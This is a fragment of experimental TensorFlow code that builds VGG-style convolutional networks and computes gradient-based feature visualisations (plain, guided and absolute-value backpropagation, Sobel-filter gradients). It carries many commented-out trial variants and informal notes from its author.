is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
##grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
# conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
# conv3_1 = tf.nn.relu(conv3_1)
# if not reuse:
# print('conv3_1', conv3_1.get_shape())
# #grads_dict['conv3_1'] = tf.gradients(conv3_1, images, conv3_1)
#with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
# conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
# conv3_2 = tf.nn.relu(conv3_2)
# if not reuse:
# print('conv3_2', conv3_2.get_shape())
# #grads_dict['conv3_2'] = tf.gradients(conv3_2, images, conv3_2)
#with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
# conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
# conv3_3 = tf.nn.relu(conv3_3)
# pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
# #pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
# if not reuse:
# print('pool3', pool3.get_shape())
# #grads_dict['conv3_3'] = tf.gradients(conv3_3, images, conv3_3)
# #grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
# conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
# conv4_1 = tf.nn.relu(conv4_1)
# if not reuse:
# print('conv4_1', conv4_1.get_shape())
# #grads_dict['conv4_1'] = tf.gradients(conv4_1, images, conv4_1)
#with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
# conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
# conv4_2 = tf.nn.relu(conv4_2)
# if not reuse:
# print('conv4_2', conv4_2.get_shape())
# #grads_dict['conv4_2'] = tf.gradients(conv4_2, images, conv4_2)
#with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
# conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
# conv4_3 = tf.nn.relu(conv4_3)
# pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
# #pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
# if not reuse:
# print('pool4', pool4.get_shape())
# #grads_dict['conv4_3'] = tf.gradients(conv4_3, images, conv4_3)
# #grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
# conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
# conv5_1 = tf.nn.relu(conv5_1)
# if not reuse:
# print('conv5_1', conv5_1.get_shape())
# #grads_dict['conv5_1'] = tf.gradients(conv5_1, images, conv5_1)
#
#with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
# conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
# conv5_2 = tf.nn.relu(conv5_2)
# if not reuse:
# print('conv5_2', conv5_2.get_shape())
# #grads_dict['conv5_2'] = tf.gradients(conv5_2, images, conv5_2)
#with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
# conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
# conv5_3 = tf.nn.relu(conv5_3)
# pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
# #pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
# if not reuse:
# print('pool5', pool5.get_shape())
# #grads_dict['conv5_3'] = tf.gradients(conv5_3, images, conv5_3)
# #grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
# trials/0
#grads_dict['pool1'] = tf.gradients(pool1, images)
#grads_dict['pool2'] = tf.gradients(pool2, images)
#grads_dict['pool3'] = tf.gradients(pool3, images)
#grads_dict['pool4'] = tf.gradients(pool4, images)
#grads_dict['pool5'] = tf.gradients(pool5, images)
SOBEL = (1==1)
if SOBEL:
#NEW_C = 64 # pool1
NEW_C = 128 # pool2
#NEW_C = 512 # pool25
sobel_x = tf.tile(sobel_x, (1,1,1,NEW_C))
sobel_y = tf.tile(sobel_y, (1,1,1,NEW_C))
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool1_sobel_x'] = tf.gradients(pool1, images, sobel_x)
#grads_dict['pool1_sobel_y'] = tf.gradients(pool1, images, sobel_y)
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
if SOBEL:
grads_dict['pool2_sobel_x'] = tf.gradients(pool2, images, sobel_x)
grads_dict['pool2_sobel_y'] = tf.gradients(pool2, images, sobel_y)
pool2 = tf.nn.l2_normalize(pool2, dim=3, epsilon=1e-12)
sobel_x = tf.nn.l2_normalize(sobel_x, dim=3, epsilon=1e-12)
sobel_y = tf.nn.l2_normalize(sobel_y, dim=3, epsilon=1e-12)
grads_dict['pool2_min_sobel_x'] = tf.gradients(pool2, images, (pool2-sobel_x))
grads_dict['pool2_min_sobel_y'] = tf.gradients(pool2, images, (pool2-sobel_y))
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#grads_dict['pool5_sobel_x'] = tf.gradients(pool5, images, sobel_x)
#grads_dict['pool5_sobel_y'] = tf.gradients(pool5, images, sobel_y)
#grads_dict['pool5_min_sobel_x'] = tf.gradients(pool5, images, (pool5-sobel_x))
#grads_dict['pool5_min_sobel_y'] = tf.gradients(pool5, images, (pool5-sobel_y))
# trials/1
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#print(grads_dict['conv1_1'][0].get_shape())
#grads_dict['2_conv1_1'] = tf.gradients(
# #grads_dict['conv1_1'], images, images)
# grads_dict['conv1_1'], images,grads_dict['conv1_1'])
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['2_conv1_2'] = tf.gradients(
# grads_dict['conv1_2'], images,grads_dict['conv1_2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['2_pool1'] = tf.gradients(
# grads_dict['pool1'], images, grads_dict['pool1'])
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3)
# trials/1
# yayayaya
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3, pool5)
# grad prop from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, grads_dict['pool5'])
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
# fail if you prop it not from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_1, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_2, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_2, pool5)
#grads_dict['pool1_conv'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, pool1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, pool2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, pool3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, pool4, pool5)
# trials/2
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2, pool5)
# trials/3
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2)
#pool4 = tf.nn.l2_normalize(pool4, dim=3, epsilon=1e-12)
#feat['pool1'] = pool1
#feat['pool2'] = pool2
#feat['pool3'] = pool3
#feat['pool3'] = tf.nn.l2_normalize(feat['pool3'], dim=3, epsilon=1e-12)
#feat['conv3_3'] = conv3_3
#feat['pool4'] = pool4
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
#feat['pool5'] = pool5
# grad as feature trial 1
#feat['pool5'] = tf.gradients(pool5, pool4, pool5)
#feat['pool4'] = tf.gradients(pool4, pool3, pool4)
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
#feat['pool3'] = tf.gradients(pool5, pool3, pool5)
#feat['pool3'] = tf.gradients(pool3, pool2, pool3)
return feat, grads_dict
def model_grad_deconv(images, is_training=False, reuse=False):
"""
Feature backpropagation following the deconv net rules i.e. backpropagate
only the positive values of the local gradients i.e. gradient of a feature
map with its predecessor.
More formally, as written in guided
backprop paper: R^l_i = (R^{l+1}_i > 0)*R^{l+1}_i
Obs: Visually the same as previous backprop so I am wondering if the
implementation of the grad of the relu in Tf does not already does this.
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
##grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
conv3_1 = tf.nn.relu(conv3_1)
if not reuse:
print('conv3_1', conv3_1.get_shape())
#grads_dict['conv3_1'] = tf.gradients(conv3_1, images, conv3_1)
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
conv3_2 = tf.nn.relu(conv3_2)
if not reuse:
print('conv3_2', conv3_2.get_shape())
#grads_dict['conv3_2'] = tf.gradients(conv3_2, images, conv3_2)
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
if not reuse:
print('pool3', pool3.get_shape())
#grads_dict['conv3_3'] = tf.gradients(conv3_3, images, conv3_3)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
conv4_1 = tf.nn.relu(conv4_1)
if not reuse:
print('conv4_1', conv4_1.get_shape())
#grads_dict['conv4_1'] = tf.gradients(conv4_1, images, conv4_1)
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
conv4_2 = tf.nn.relu(conv4_2)
if not reuse:
print('conv4_2', conv4_2.get_shape())
#grads_dict['conv4_2'] = tf.gradients(conv4_2, images, conv4_2)
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
conv4_3 = tf.nn.relu(conv4_3)
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
if not reuse:
print('pool4', pool4.get_shape())
#grads_dict['conv4_3'] = tf.gradients(conv4_3, images, conv4_3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
conv5_1 = tf.nn.relu(conv5_1)
if not reuse:
print('conv5_1', conv5_1.get_shape())
#grads_dict['conv5_1'] = tf.gradients(conv5_1, images, conv5_1)
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
conv5_2 = tf.nn.relu(conv5_2)
if not reuse:
print('conv5_2', conv5_2.get_shape())
#grads_dict['conv5_2'] = tf.gradients(conv5_2, images, conv5_2)
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
#pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
if not reuse:
print('pool5', pool5.get_shape())
#grads_dict['conv5_3'] = tf.gradients(conv5_3, images, conv5_3)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
feat['pool3'] = pool3
feat['pool4'] = pool4
feat['pool5'] = pool5
#grads_dict['pool1_raw'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool2_raw'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3_raw'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4_raw'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5_raw'] = tf.gradients(pool5, images, pool5)
DECONV = (0==1)
# random idea of mine to take the absolute value of features
# before backpropagating them
ABS = (1==1)
GUIDED_BACKPROP = (0==1)
# same as backprop so maybe tf implements relu backprop using deconv
# I ay have miscoded it because I don't undestand why it is the same
if GUIDED_BACKPROP:
# grad for 1
grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
grads_dict['pool1'] = grads_dict['pool1']*(grads_dict['pool1']>0)
#grads_dict['pool1'] = grads_dict['pool1']*(pool1>0)
# grad for 2
grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
print('grads_dict[pool2].shape', grads_dict['pool2'][0].get_shape())
grads_dict['pool2'] = grads_dict['pool2'][0]*tf.cast((pool1>0), tf.float32)
grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
#grads_dict['pool2'] = grads_dict['pool2']*(pool2>0)
# grad for 3
grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
grads_dict['pool3'] = grads_dict['pool3'][0]*tf.cast(pool2>0, tf.float32)
#print('grads_dict[pool3].shape', grads_dict['pool3'][0].get_shape())
grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
grads_dict['pool3'] = grads_dict['pool3'][0]*tf.cast(pool1>0, tf.float32)
grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
#grads_dict['pool3'] = grads_dict['pool3']*(pool3>0)
# grad for 4
grads_dict['pool4'] = tf.gradients(pool4, pool3, pool4)
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool3>0, tf.float32)
grads_dict['pool4'] = tf.gradients(pool3, pool2, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool2>0, tf.float32)
grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool1>0, tf.float32)
grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
#grads_dict['pool4'] = grads_dict['pool4']*(pool4>0)
# grad for 5
grads_dict['pool5'] = tf.gradients(pool5, pool4, pool5)
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool4>0, tf.float32)
grads_dict['pool5'] = tf.gradients(pool4, pool3, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool3>0, tf.float32)
grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool2>0, tf.float32)
grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool1>0, tf.float32)
grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
#grads_dict['pool5'] = grads_dict['pool5']*(pool5>0)
# gradmaps are less noisy. Test your stuff on this gradient.
# yes it means more tests ... :(
if ABS:
# grad for 1
grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool1'] = tf.abs(grads_dict['pool1'])
#print(grads_dict['pool1'][0].get_shape())
#raw_input('wait')
# grad for 2
grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
grads_dict['pool2'] = tf.nn.relu(grads_dict['pool2'][0]) + tf.nn.relu(-grads_dict['pool2'][0])
grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
#grads_dict['pool2'] = tf.abs(grads_dict['pool2'])
## grad for 3
grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
